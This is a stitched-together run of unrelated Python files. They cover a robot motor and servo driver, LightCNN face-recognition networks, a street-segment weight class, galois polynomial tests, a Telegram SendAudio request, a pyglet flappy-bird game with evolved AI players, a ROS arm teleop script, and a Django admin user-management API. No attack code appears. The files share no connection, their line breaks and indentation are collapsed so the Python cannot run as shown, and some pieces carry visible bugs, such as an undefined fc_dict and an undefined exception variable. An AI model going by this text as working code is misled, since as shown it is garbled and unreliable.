setNeckJoystickPos( self, joystickX, joystickY ): joystickX, joystickY = self.normaliseJoystickData( joystickX, joystickY ) # Set pan and tilt angle speeds self.panSpeed = -self.MAX_ABS_NECK_SPEED*joystickX self.tiltSpeed = -self.MAX_ABS_NECK_SPEED*joystickY self.lastMotionCommandTime = time.time() #----------------------------------------------------------------------------------------------- def setNeckAngles( self, panAngle, tiltAngle ): self.panAngle = max( self.MIN_ANGLE, min( panAngle, self.MAX_ANGLE ) ) self.tiltAngle = max( self.MIN_ANGLE, min( tiltAngle, self.MAX_ANGLE ) ) self.panSpeed = 0.0 self.tiltSpeed = 0.0 self.lastMotionCommandTime = time.time() #----------------------------------------------------------------------------------------------- def _loadPiSensorModule( self ): if self.robotConfig.piSensorModuleName != "": # Try to import the new sensor module newSensorModule = None try: newSensorModule = __import__( self.robotConfig.piSensorModuleName, fromlist=[''] ) except Exception as e: logging.error( "Caught exception when trying to import Pi sensor module" ) logging.error( str( e ) ) if newSensorModule != None: # We have a new sensor module. Shutdown any existing sensor reader if self.piSensorReader != None: self.piSensorReader.shutdown() self.piSensorReader = None # Remove reference to existing sensor module self.piSensorModule = None self.piSensorModuleName = "" # Try to create the new Pi sensor reader newSensorReader = None try: newSensorReader = newSensorModule.PiSensorReader() except Exception as e: logging.error( "Caught exception when trying to create Pi sensor reader" ) logging.error( str( e ) ) if newSensorReader != None: self.piSensorModule = newSensorModule self.piSensorModuleName = self.robotConfig.piSensorModuleName self.piSensorReader = newSensorReader #----------------------------------------------------------------------------------------------- def update( self ): if not self.miniDriver.isConnected(): return curTime = time.time() timeDiff = min( curTime - self.lastUpdateTime, self.MAX_UPDATE_TIME_DIFF ) # Turn off the motors if we haven't received a motion command for a while if curTime - self.lastMotionCommandTime > self.MOTION_COMMAND_TIMEOUT: self.leftMotorSpeed = 0.0 self.rightMotorSpeed = 0.0 self.panSpeed = 0.0 self.tiltSpeed = 0.0 # Update the pan and tilt angles self.panAngle += self.panSpeed*timeDiff self.tiltAngle += self.tiltSpeed*timeDiff self.panAngle = max( self.MIN_ANGLE, min( self.panAngle, self.MAX_ANGLE ) ) self.tiltAngle = max( self.MIN_ANGLE, min( self.tiltAngle, self.MAX_ANGLE ) ) # Update the mini driver self.miniDriver.setOutputs( self.leftMotorSpeed, self.rightMotorSpeed, self.panAngle, self.tiltAngle ) self.miniDriver.update() # Send servo settings if needed if curTime - self.lastServoSettingsSendTime >= self.TIME_BETWEEN_SERVO_SETTING_UPDATES: self.miniDriver.setPanServoLimits( self.robotConfig.panPulseWidthMin, self.robotConfig.panPulseWidthMax ) self.miniDriver.setTiltServoLimits( self.robotConfig.tiltPulseWidthMin, self.robotConfig.tiltPulseWidthMax ) self.lastServoSettingsSendTime = curTime # Send sensor configuration if needed if curTime - self.lastSensorConfigurationSendTime >= self.TIME_BETWEEN_SENSOR_CONFIGURATION_UPDATES: self.miniDriver.setSensorConfiguration( self.robotConfig.miniDriverSensorConfiguration ) self.lastSensorConfigurationSendTime = curTime # Change the Pi sensor module if needed if self.robotConfig.piSensorModuleName != self.piSensorModuleName: self._loadPiSensorModule() # Read from any sensors attached to the Pi if self.piSensorReader != None: self.piSensorDict = {} try: self.piSensorDict = self.piSensorReader.readSensors() except Exception as e: logging.error( "Caught exception when trying to read from Pi sensor reader" ) logging.error( str( e ) ) self.lastUpdateTime = curTime
import torch import torch.nn as nn import torch.nn.functional as F class mfm(nn.Module): def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=1, type=1): super(mfm, self).__init__() self.out_channels = out_channels if type == 1: self.filter = nn.Conv2d(in_channels, 2*out_channels, kernel_size=kernel_size, stride=stride, padding=padding) else: self.filter = nn.Linear(in_channels, 2*out_channels) def forward(self, x): x = self.filter(x) out = torch.split(x, self.out_channels, 1) return torch.max(out[0], out[1]) class group(nn.Module): def __init__(self, in_channels, out_channels, kernel_size, stride, padding): super(group, self).__init__() self.conv_a = mfm(in_channels, in_channels, 1, 1, 0) self.conv = mfm(in_channels, out_channels, kernel_size, stride, padding) def forward(self, x): x = self.conv_a(x) x = self.conv(x) return x class resblock(nn.Module): def __init__(self, in_channels, out_channels): super(resblock, self).__init__() self.conv1 = mfm(in_channels, out_channels, kernel_size=3, stride=1, padding=1) self.conv2 = mfm(in_channels, out_channels, kernel_size=3, stride=1, padding=1) def forward(self, x): res = x out = self.conv1(x) out = self.conv2(out) out = out + res return out class network_9layers(nn.Module): def __init__(self, num_classes=79077): super(network_9layers, self).__init__() self.features = nn.Sequential( mfm(1, 48, 5, 1, 2), nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True), group(48, 96, 3, 1, 1), nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True), group(96, 192, 3, 1, 1), nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True), group(192, 128, 3, 1, 1), group(128, 128, 3, 1, 1), nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True), ) self.fc1 = mfm(8*8*128, 256, type=0) self.fc2 = nn.Linear(256, num_classes) def forward(self, x): x = self.features(x) x = x.view(x.size(0), -1) x = self.fc1(x) x = F.dropout(x, training=self.training) out = self.fc2(x) return out, x class network_29layers(nn.Module): def __init__(self, block, layers, num_classes=79077): super(network_29layers, self).__init__() self.conv1 = mfm(1, 48, 5, 1, 2) self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True) self.block1 = self._make_layer(block, layers[0], 48, 48) self.group1 = group(48, 96, 3, 1, 1) self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True) self.block2 = self._make_layer(block, layers[1], 96, 96) self.group2 = group(96, 192, 3, 1, 1) self.pool3 = nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True) self.block3 = self._make_layer(block, layers[2], 192, 192) self.group3 = group(192, 128, 3, 1, 1) self.block4 = self._make_layer(block, layers[3], 128, 128) self.group4 = group(128, 128, 3, 1, 1) self.pool4 = nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True) self.fc = mfm(8*8*128, 256, type=0) self.fc2 = nn.Linear(256, num_classes) def _make_layer(self, block, num_blocks, in_channels, out_channels): layers = [] for i in range(0, num_blocks): layers.append(block(in_channels, out_channels)) return nn.Sequential(*layers) def forward(self, x): x = self.conv1(x) x = self.pool1(x) x = self.block1(x) x = self.group1(x) x = self.pool2(x) x = self.block2(x) x = self.group2(x) x = self.pool3(x) x = self.block3(x) x = self.group3(x) x = self.block4(x) x = self.group4(x) x = self.pool4(x) x = x.view(x.size(0), -1) fc = self.fc(x) fc = F.dropout(fc, training=self.training) out = self.fc2(fc) return out, fc class network_29layers_v2(nn.Module): def __init__(self, block, layers, num_classes=79077): super(network_29layers_v2, self).__init__() self.conv1 = mfm(1, 48, 5, 1, 2) self.block1 = self._make_layer(block, layers[0], 48, 48) self.group1 = group(48, 96, 3, 1, 1) self.block2 = self._make_layer(block, layers[1], 96, 96) self.group2 = group(96, 192, 3, 1, 1) self.block3 = self._make_layer(block, layers[2], 192, 192) self.group3 = group(192, 128, 3, 1, 1) self.block4 = self._make_layer(block, layers[3], 128, 128) self.group4 = group(128, 128, 3, 1, 1) self.fc = nn.Linear(8*8*128, 256) self.fc2 = nn.Linear(256, num_classes[0], bias=False) def _make_layer(self, block, num_blocks, in_channels, out_channels): layers = [] for i in range(0, num_blocks): layers.append(block(in_channels, out_channels)) return nn.Sequential(*layers) def forward(self, x): x = self.conv1(x) x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2) x = self.block1(x) x = self.group1(x) x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2) x = self.block2(x) x = self.group2(x) x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2) x = self.block3(x) x = self.group3(x) x = self.block4(x) x = self.group4(x) x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2) x = x.view(x.size(0), -1) fc = self.fc(x) x = F.dropout(fc, training=self.training) output = list() for name, fun in self.fc_dict.iteritems(): out = fun(x) output.append(out) return output, fc class network_9layers_templet(nn.Module): def __init__(self, in_channel): super(network_9layers_templet, self).__init__() self.features = nn.Sequential( mfm(in_channel, 48, 5, 1, 2), nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True), group(48, 96, 3, 1, 1), nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True), group(96, 192, 3, 1, 1), nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True), group(192, 128, 3, 1, 1), group(128, 128, 3, 1, 1), nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True), ) self.fc1 = mfm(8*8*128, 256, type=0) def forward(self, x): x = self.features(x) x = x.view(x.size(0), -1) x = self.fc1(x) out = F.dropout(x, training=self.training) return out class network_29layers_v2_templet(nn.Module): def __init__(self, in_channel, block, layers): super(network_29layers_v2_templet, self).__init__() self.conv1 = mfm(in_channel, 48, 5, 1, 2) self.block1 = self._make_layer(block, layers[0], 48, 48) self.group1 = group(48, 96, 3, 1, 1) self.block2 = self._make_layer(block, layers[1], 96, 96) self.group2 = group(96, 192, 3, 1, 1) self.block3 = self._make_layer(block, layers[2], 192, 192) self.group3 = group(192, 256, 3, 1, 1) self.block4 = self._make_layer(block, layers[3], 256, 256) self.group4 = group(256, 128, 3, 1, 1) self.block5 = self._make_layer(block, layers[4], 128, 128) self.group5 = group(128, 64, 3, 1, 1) self.block6 = self._make_layer(block, layers[5], 64, 64) self.group6 = group(64, 64, 3, 1, 1) self.fc = nn.Linear(8*8*64, 256) def _make_layer(self, block, num_blocks, in_channels, out_channels): layers = [] for i in range(0, num_blocks): layers.append(block(in_channels, out_channels)) return nn.Sequential(*layers) def forward(self, x): ''' x = self.conv1(x) x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2) x = self.block1(x) x = self.group1(x) x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2) x = self.block2(x) x = self.group2(x) x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2) x = self.block3(x) x = self.group3(x) x = self.block4(x) x = self.group4(x) x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2) x = x.view(x.size(0), -1) fc = self.fc(x) x = F.dropout(fc, training=self.training) ''' x = self.conv1(x) x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2) x = self.block1(x) x = self.group1(x) x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2) x = self.block2(x) x = self.group2(x) x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2) x = self.block3(x) x = self.group3(x) x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2) x = self.block4(x) x = self.group4(x) x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2) x = self.block5(x) x = self.group5(x) x = self.block6(x) x = self.group6(x) x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2) x = x.view(x.size(0), -1) fc = self.fc(x) x = F.dropout(fc, training=self.training) return x def LightCNN_9Layers(**kwargs): model = network_9layers(**kwargs) return model def LightCNN_29Layers(**kwargs): model = network_29layers(resblock, [1, 2, 3, 4], **kwargs) return model def LightCNN_29Layers_v2(**kwargs): model = network_29layers_v2(resblock, [1, 2, 3, 4], **kwargs) return model def LightCNN_9Layers_templet(in_channel, pretrained=False): model = network_9layers_templet(in_channel) return model def LightCNN_29Layers_v2_templet(in_channel, pretrained=False): model = network_29layers_v2_templet(in_channel, resblock, [1,2,3,4,5,6]) return model if __name__ == "__main__": model = LightCNN_29Layers_v2_templet(3) print(model)
""" ``street.py`` ============= Módulo para o peso de um trecho de rua """ from __future__ import annotations from protocols import Weightable from random import choice from functools import total_ordering from typing import Optional, List, Any, Dict #: Incluir velocidade máxima entre as possibilidades #: de velocidade assumida naquele trecho de rua INCLUDE_MAX_SPEED = False @total_ordering class Street(Weightable): """ Classe de peso (:class:`Weightable`) do trecho da rua Assim que a propriedade :attr:`~street.Street.speed` é lida pela primeira vez, ela assume um valor que é mantido com ela durante a vida do objeto. No entanto, quuando essa instância é copiada com :func:`copy.deepcopy`, essa propriedade é desconfigurada e ela pode assumir um novo valor. :param distance: distância do trecho :param max_speed: velocidade máxima do trecho """ def __init__(self, distance: float, max_speed: float): self._distance = distance self._max_speed = max_speed self._latest_speeds: List[float] = [] self._speed: Optional[float] = None def register_speeds(self, *speeds: float) -> None: """Registra as velocidades atuais no trecho""" self._latest_speeds += list(speeds) @property def speed(self) -> float: """Velocidade assumida no trecho""" if self._speed is None: if INCLUDE_MAX_SPEED: self._speed = choice(self._latest_speeds + [self._max_speed]) elif self._latest_speeds: self._speed = choice(self._latest_speeds) else: self._speed = self._max_speed return self._speed @property def distance(self) -> float: """distância do trecho""" return self._distance @property def time(self) -> float: """tempo no trecho, com a velocidade assumida Usado para a comparação entre trechos """ if self.speed: return self.distance / self.speed else: return float('inf') def is_inf(self) -> bool: """Se a velocidade assumida representa um tempo infinito""" return not self.speed def __eq__(self, other: Any) -> bool: return isinstance(other, Street) and self.time == other.time def __lt__(self, other: Any) -> bool: return isinstance(other, Street) and self.time < other.time def __add__(self, other: Street) -> Street: """A soma dos trechos equivale a soma dos tempos""" d1, d2 = self.distance, other.distance s1, s2 = self.speed, other.speed distance = d1 + d2 if not s1 or not s2: speed = 0.0 else: speed = (distance * s1 * s2) / (d1 * s2 + d2 * s1) return Street(distance, speed) def __repr__(self) -> str: return repr(self.time) def __deepcopy__(self, memo: Dict[int, Any]) -> Street: """Cópia especial que não mantém a velocidade assumida""" new = Street(self.distance, self._max_speed) new.register_speeds(*self._latest_speeds) memo[id(self)] = new return new
""" A pytest module to test Galois field polynomial alternate constructors. """ import numpy as np import pytest import galois FIELDS = [ galois.GF2, # GF(2) galois.GF(31), # GF(p) with np.int dtypes galois.GF(36893488147419103183), # GF(p) with object dtype galois.GF(2**8), # GF(2^m) with np.int dtypes galois.GF(2**100), # GF(2^m) with object dtype galois.GF(7**3), # GF(p^m) with np.int dtypes galois.GF(109987**4), # GF(p^m) with object dtypes ] @pytest.mark.parametrize("field", FIELDS) def test_zero(field): p = galois.Poly.Zero(field) assert isinstance(p, galois.Poly) assert p.field is field assert p.degree == 0 assert np.array_equal(p.nonzero_degrees, []) assert np.array_equal(p.nonzero_coeffs, []) assert np.array_equal(p.degrees, [0]) assert np.array_equal(p.coeffs, [0]) assert p.integer == 0 @pytest.mark.parametrize("field", FIELDS) def test_one(field): p = galois.Poly.One(field) assert isinstance(p, galois.Poly) assert p.field is field assert p.degree == 0 assert np.array_equal(p.nonzero_degrees, [0]) assert np.array_equal(p.nonzero_coeffs, [1]) assert np.array_equal(p.degrees, [0]) assert np.array_equal(p.coeffs, [1]) assert p.integer == 1 @pytest.mark.parametrize("field", FIELDS) def test_identity(field): p = galois.Poly.Identity(field) assert isinstance(p, galois.Poly) assert p.field is field assert p.degree == 1 assert np.array_equal(p.nonzero_degrees, [1]) assert np.array_equal(p.nonzero_coeffs, [1]) assert np.array_equal(p.degrees, [1,0]) assert np.array_equal(p.coeffs, [1,0]) assert p.integer == field.order @pytest.mark.parametrize("field", FIELDS) def test_random(field): p = galois.Poly.Random(2, field=field) assert isinstance(p, galois.Poly) assert p.field is field assert p.degree == 2 @pytest.mark.parametrize("field", FIELDS) def test_integer(field): integer = field.order + 1 # Corresponds to p(x) = x + 1 p = galois.Poly.Integer(integer, field=field) assert isinstance(p, galois.Poly) assert p.field is field assert p.degree == 1 assert np.array_equal(p.nonzero_degrees, [1,0]) assert np.array_equal(p.nonzero_coeffs, [1,1]) assert np.array_equal(p.degrees, [1,0]) assert np.array_equal(p.coeffs, [1,1]) assert p.integer == integer @pytest.mark.parametrize("field", FIELDS) def test_degrees(field): # Corresponds to p(x) = x^2 + 1 degrees = [2,0] coeffs = [1,1] p = galois.Poly.Degrees(degrees, coeffs, field=field) assert isinstance(p, galois.Poly) assert p.field is field assert p.degree == 2 assert np.array_equal(p.nonzero_degrees, [2,0]) assert np.array_equal(p.nonzero_coeffs, [1,1]) assert np.array_equal(p.degrees, [2,1,0]) assert np.array_equal(p.coeffs, [1,0,1]) assert p.integer == field.order**2 + 1 @pytest.mark.parametrize("field", FIELDS) def test_roots(field): a, b = field.Random(), field.Random() roots = [a, b] # p(x) = (x - a)*(x - b) degree = 2 degrees = [2, 1, 0] coeffs = [1, -a + -b, (-a)*(-b)] nonzero_degrees = [d for d, c in zip(degrees, coeffs) if c > 0] nonzero_coeffs = [c for d, c in zip(degrees, coeffs) if c > 0] integer = sum([int(c)*field.order**d for d, c in zip(degrees, coeffs)]) p = galois.Poly.Roots(roots, field=field) assert isinstance(p, galois.Poly) assert p.field is field assert p.degree == degree assert np.array_equal(p.nonzero_degrees, nonzero_degrees) assert np.array_equal(p.nonzero_coeffs, nonzero_coeffs) assert np.array_equal(p.degrees, degrees) assert np.array_equal(p.coeffs, coeffs) assert p.integer == integer @pytest.mark.parametrize("field", FIELDS) def test_roots_with_multiplicity(field): a = field.Random() roots = [a] # p(x) = (x - a)*(x - a) multiplicities = [2] degree = 2 degrees = [2, 1, 0] coeffs = [1, -a + -a, (-a)*(-a)] nonzero_degrees = [d for d, c in zip(degrees, coeffs) if c > 0] nonzero_coeffs = [c for d, c in zip(degrees, coeffs) if c > 0] integer = sum([int(c)*field.order**d for d, c in zip(degrees, coeffs)]) p = galois.Poly.Roots(roots, multiplicities=multiplicities, field=field) assert isinstance(p, galois.Poly) assert p.field is field assert p.degree == degree assert np.array_equal(p.nonzero_degrees, nonzero_degrees) assert np.array_equal(p.nonzero_coeffs, nonzero_coeffs) assert np.array_equal(p.degrees, degrees) assert np.array_equal(p.coeffs, coeffs) assert p.integer == integer
# Copyright (C) 2015-2022 by Vd. # This file is part of Rocketgram, the modern Telegram bot framework. # Rocketgram is released under the MIT License (see LICENSE). from dataclasses import dataclass from typing import Union, Optional, List from .input_file import InputFile from .message_entity import MessageEntity from .parse_mode_type import ParseModeType from .request import Request from .utils import ALL_KEYBOARDS, MessageResultMixin @dataclass(frozen=True) class SendAudio(MessageResultMixin, Request): """\ Represents SendAudio request object: https://core.telegram.org/bots/api#sendaudio """ chat_id: Union[int, str] audio: Union[InputFile, str] caption: Optional[str] = None parse_mode: Optional[ParseModeType] = None caption_entities: Optional[List[MessageEntity]] = None duration: Optional[int] = None performer: Optional[str] = None title: Optional[str] = None thumb: Optional[Union[InputFile, str]] = None disable_notification: Optional[bool] = None protect_content: Optional[bool] = None reply_to_message_id: Optional[int] = None allow_sending_without_reply: Optional[bool] = None reply_markup: Optional[ALL_KEYBOARDS] = None def files(self) -> List[InputFile]: out = list() if isinstance(self.audio, InputFile): out.append(self.audio) if isinstance(self.thumb, InputFile): out.append(self.thumb) return out
import pyglet from pyglet.window import key from pyglet.window.key import MOD_SHIFT from CGP import Individual, create_pop, evolve from load import * game_window = pyglet.window.Window(1600, 1000) pyglet.resource.path = ['../assets'] pyglet.resource.reindex() main_batch = pyglet.graphics.Batch() pillar_batch = pyglet.graphics.Batch() ai_batch = pyglet.graphics.Batch() label_score = labels(batch=main_batch) label_alive = labels(y=520, batch=main_batch) label_best = labels(y=540, batch=main_batch) label_generation = labels(y=560, batch=main_batch) pillars = new_pillar(pillar_batch) completion = False score = 0 best_score = 0 # FIXME time_count = 0 flag = 0 alive = 0 generation = 1 ai_num = "" pop = None birds_obj = [] ai_birds_obj = [] def create_ai_bird(pops): global alive, ai_num for ind in pops: ai_birds_obj.append(new_ai_birds(individual=ind, batch=ai_batch)) alive += 1 ai_num = str(alive) def clear_game(): global pillars, generation, score, time_count for obj in pillars: obj.delete() pillars.remove(obj) for obj in birds_obj: obj.delete() birds_obj.remove(obj) generation += 1 score = 0 time_count = 0 pillars = new_pillar(pillar_batch) def init(): global birds_obj, score score = 0 label_score.text = "Score: " + str(score) birds_obj.append(new_birds(main_batch)) def init_pop(): global ai_birds_obj, alive, ai_num, pop pop = create_pop(10) create_ai_bird(pop) label_alive.text = "Alive: " + str(alive) + "/" + ai_num label_generation.text = "Generation: " + str(generation) label_best.text = "Best score: " + str(best_score) @game_window.event def on_draw(): global completion game_window.clear() main_batch.draw() pillar_batch.draw() ai_batch.draw() for b in birds_obj: game_window.push_handlers(b.get_key_handler()) @game_window.event def on_key_press(symbol, modifiers): # add a new player bird if modifiers & MOD_SHIFT: if symbol == key.N: birds_obj.extend([new_birds(main_batch)]) # make it faster if modifiers & MOD_SHIFT: if symbol == key.EQUAL: print("speed up") pyglet.clock.schedule_interval(update, 1 / 120.0) # make it stop if modifiers & MOD_SHIFT: if symbol == key.BACKSPACE: print("stop") pyglet.clock.unschedule(update) def update(dt): global completion, score, time_count, flag, alive, pop, best_score time_count += 1 # update for b in birds_obj: b.update(dt) # check collide if b.collide_down(pillars[0]) or b.collide_up(pillars[1]): b.dead = True for p in pillars: p.update(dt) for b in ai_birds_obj: if b.collide_down(pillars[0]) or b.collide_up(pillars[1]): b.dead = True b.update(dt) # flap or not b.check_flap(pillars[0].x, pillars[0].y) # check pillars out of bounds if pillars[0].check_bounds(): pillars[0].dead = True pillars[1].dead = True # remove dead objects for to_remove in [obj for obj in pillars if obj.dead]: to_remove.delete() pillars.remove(to_remove) for to_remove in [obj for obj in birds_obj if obj.dead]: to_remove.delete() birds_obj.remove(to_remove) for to_remove in [obj for obj in ai_birds_obj if obj.dead]: alive -= 1 to_remove.delete() ai_birds_obj.remove(to_remove) # add new pillars and reset flag for score if time_count % 240 == 0: time_count = 0 flag = 0 add_pillars = new_pillar(pillar_batch) pillars.extend(add_pillars) # label # score if flag == 0 and (len(birds_obj) > 0 or len(ai_birds_obj) > 0) and pillars[0].check_score(): # print(time_count) flag += 1 score += 1 label_score.text = "Score: " + str(int(score)) # check alive AI label_alive.text = "Alive: " + str(alive) + "/" + ai_num # check best score if score > best_score: best_score = score label_best.text = "Best score: " + str(best_score) # check generation label_generation.text = "Generation: " + str(generation) # evolve AI if alive == 0: pop = evolve(pop, 0.03, 4, 6) clear_game() create_ai_bird(pop) if __name__ == '__main__': init() init_pop() # init_ai() pyglet.clock.schedule_interval(update, 1 / 120.0) pyglet.app.run()
r""" Remote (pmaf.remote) ==================== Exploit remote databases ------------------------ Classes ------- .. autosummary:: :toctree: generated/ Entrez """ from ._entrez import Entrez __all__ = ['Entrez']
import rospy from std_msgs.msg import Float64 import sys, select, termios, tty msg = """ Move the Arm Links !! --------------------------- Rotating (i), Picking(l) and Jaw Arm(o): u i o j k l m , . space key, k : force stop anything else : stop smoothly CTRL-C to quit """ moveBindings = { 'i':(1,0), 'o':(1,-1), 'j':(0,1), 'l':(0,-1), 'u':(1,1), ',':(-1,0), '.':(-1,1), 'm':(-1,-1), } speedBindings={ 'q':(1.1,1.1), 'z':(.9,.9), 'w':(1.1,1), 'x':(.9,1), 'e':(1,1.1), 'c':(1,.9), } def getKey(): tty.setraw(sys.stdin.fileno()) rlist, _, _ = select.select([sys.stdin], [], [], 0.1) if rlist: key = sys.stdin.read(1) else: key = '' termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings) return key speed = 0.1 turn = 0.8 def vels(speed,turn): return "currently:\tspeed %s\tturn %s " % (speed,turn) if __name__=="__main__": settings = termios.tcgetattr(sys.stdin) rospy.init_node('arm_teleop') pub_pick = rospy.Publisher('/robot_arm/picking_arm_controller/command', Float64, queue_size = 10) # Picking Arm controller pub_rotate = rospy.Publisher('/robot_arm/rotating_arm_controller/command', Float64, queue_size = 10) # Rotating Arm controller pub_jaw = rospy.Publisher('/robot_arm/jaw_arm_controller/command', Float64, queue_size = 10) # Jaw Arm controller x = 1 th = 0 status = 0 count = 0 acc = 0.1 target_speed = 0 target_turn = 0 control_speed = 0 control_turn = 0 speed = 8 try: print msg print vels(speed,turn) while(1): key = getKey() if key in moveBindings.keys(): x = moveBindings[key][0] th = moveBindings[key][1] count = 0 elif key in speedBindings.keys(): speed = speed * speedBindings[key][0] turn = turn * speedBindings[key][1] count = 0 print vels(speed,turn) if (status == 14): print msg status = (status + 1) % 15 elif key == ' ' or key == 'k' : x = 0 th = 0 control_speed = 0 control_turn = 0 else: count = count + 1 if count > 10: x = 0 th = 0 pass if (key == '\x03'): break target_speed = speed * x target_turn = turn * th if target_speed > control_speed: control_speed = min( target_speed, control_speed + 0.02 ) elif target_speed < control_speed: control_speed = max( target_speed, control_speed - 0.02 ) else: control_speed = target_speed if target_turn > control_turn: control_turn = min( target_turn, control_turn + 0.1 ) elif target_turn < control_turn: control_turn = max( target_turn, control_turn - 0.1 ) else: control_turn = target_turn pub_pick.publish(control_turn) # Picking Arm speed pub_rotate.publish(control_speed) # Rotating Arm speed pub_jaw.publish(control_turn) # Jaw Arm speed except: print e finally: pub_pick.publish(control_turn) # Picking Arm speed pub_rotate.publish(control_speed) # Rotating Arm speed pub_jaw.publish(control_turn) # Jaw Arm speed termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
import os import argus _example = argus.EXAMPLE_DRAG_CLOTH python_path = os.path.dirname(os.path.realpath(__file__)) argus_interface = os.path.join(python_path, 'argus_interface.py') os.system('python {} -e {}'.format(argus_interface, _example))
import os import re import xlsxwriter from django.db import transaction, IntegrityError from django.db.models import Q from django.http import HttpResponse from django.contrib.auth.hashers import make_password from submission.models import Submission from utils.api import APIView, validate_serializer from utils.shortcuts import rand_str from ..decorators import super_admin_required from ..models import AdminType, ProblemPermission, User, UserProfile from ..serializers import EditUserSerializer, UserAdminSerializer, GenerateUserSerializer from ..serializers import ImportUserSeralizer class UserAdminAPI(APIView): @validate_serializer(ImportUserSeralizer) @super_admin_required def post(self, request): """ Import User """ data = request.data["users"] user_list = [] for user_data in data: if len(user_data) != 3 or len(user_data[0]) > 32: return self.error(f"Error occurred while processing data '{user_data}'") user_list.append(User(username=user_data[0], password=make_password(user_data[1]), email=user_data[2])) try: with transaction.atomic(): ret = User.objects.bulk_create(user_list) UserProfile.objects.bulk_create([UserProfile(user=user) for user in ret]) return self.success() except IntegrityError as e: # Extract detail from exception message # duplicate key value violates unique constraint "user_username_key" # DETAIL: Key (username)=(root11) already exists. return self.error(str(e).split("\n")[1]) @validate_serializer(EditUserSerializer) @super_admin_required def put(self, request): """ Edit user api """ data = request.data if not data["sno"].isdigit(): return self.error("Student ID must be digital") try: user = User.objects.get(id=data["id"]) except User.DoesNotExist: return self.error("User does not exist") if User.objects.filter(username=data["username"].lower()).exclude(id=user.id).exists(): return self.error("Username already exists") if User.objects.filter(email=data["email"].lower()).exclude(id=user.id).exists(): return self.error("Email already exists") if User.objects.filter(sno=data["sno"]).exclude(id=user.id).exists(): return self.error("Student ID already exists") pre_username = user.username user.username = data["username"].lower() user.sno = data["sno"] user.email = data["email"].lower() user.admin_type = data["admin_type"] user.is_disabled = data["is_disabled"] if data["admin_type"] == AdminType.ADMIN: user.problem_permission = data["problem_permission"] elif data["admin_type"] == AdminType.SUPER_ADMIN: user.problem_permission = ProblemPermission.ALL else: user.problem_permission = ProblemPermission.NONE if data["password"]: user.set_password(data["password"]) if data["open_api"]: # Avoid reset user appkey after saving changes if not user.open_api: user.open_api_appkey = rand_str() else: user.open_api_appkey = None user.open_api = data["open_api"] if data["two_factor_auth"]: # Avoid reset user tfa_token after saving changes if not user.two_factor_auth: user.tfa_token = rand_str() else: user.tfa_token = None user.two_factor_auth = data["two_factor_auth"] user.save() if pre_username != user.username: Submission.objects.filter(username=pre_username).update(username=user.username) UserProfile.objects.filter(user=user).update(real_name=data["real_name"]) return self.success(UserAdminSerializer(user).data) @super_admin_required def get(self, request): """ User list api / Get user by id """ user_id = request.GET.get("id") if user_id: try: user = User.objects.get(id=user_id) except User.DoesNotExist: return self.error("User does not exist") return self.success(UserAdminSerializer(user).data) user = User.objects.all().order_by("-create_time") keyword = request.GET.get("keyword", None) if keyword: user = user.filter(Q(username__icontains=keyword) | Q(userprofile__real_name__icontains=keyword) | Q(email__icontains=keyword)) return self.success(self.paginate_data(request, user, UserAdminSerializer)) @super_admin_required def delete(self, request): id = request.GET.get("id") if not id: return self.error("Invalid Parameter, id is required") ids = id.split(",") if str(request.user.id) in ids: return self.error("Current user can not be deleted") User.objects.filter(id__in=ids).delete() return self.success() class GenerateUserAPI(APIView): @super_admin_required def get(self, request): """ download users excel """ file_id = request.GET.get("file_id") if not file_id: return self.error("Invalid Parameter, file_id is required") if not re.match(r"^[a-zA-Z0-9]+$", file_id): return self.error("Illegal file_id") file_path = f"/tmp/{file_id}.xlsx" if not os.path.isfile(file_path): return self.error("File does not exist") with open(file_path, "rb") as f: raw_data = f.read() os.remove(file_path) response = HttpResponse(raw_data) response["Content-Disposition"] = f"attachment; filename=users.xlsx" response["Content-Type"] = "application/xlsx" return response @validate_serializer(GenerateUserSerializer) @super_admin_required def post(self, request): """ Generate User """ data = request.data number_max_length = max(len(str(data["number_from"])), len(str(data["number_to"]))) if number_max_length + len(data["prefix"]) + len(data["suffix"]) > 32: return self.error("Username should not more than 32 characters") if data["number_from"] > data["number_to"]: return self.error("Start number must be lower than end number") file_id = rand_str(8) filename = f"/tmp/{file_id}.xlsx" workbook = xlsxwriter.Workbook(filename) worksheet = workbook.add_worksheet() worksheet.set_column("A:B", 20) worksheet.write("A1", "Username") worksheet.write("B1", "Password") i = 1 user_list = [] for number in range(data["number_from"], data["number_to"] + 1): raw_password = rand_str(data["password_length"]) user = User(username=f"{data['prefix']}{number}{data['suffix']}", password=make_password(raw_password)) user.raw_password = raw_password user_list.append(user) try: with transaction.atomic(): ret = User.objects.bulk_create(user_list) UserProfile.objects.bulk_create([UserProfile(user=user) for user in ret]) for item in user_list: worksheet.write_string(i, 0, item.username) worksheet.write_string(i, 1, item.raw_password) i += 1 workbook.close() return self.success({"file_id": file_id}) except IntegrityError as e: # Extract detail from exception message # duplicate key value violates unique constraint "user_username_key" # DETAIL: Key (username)=(root11) already exists. return self.error(str(e).split("\n")[1])
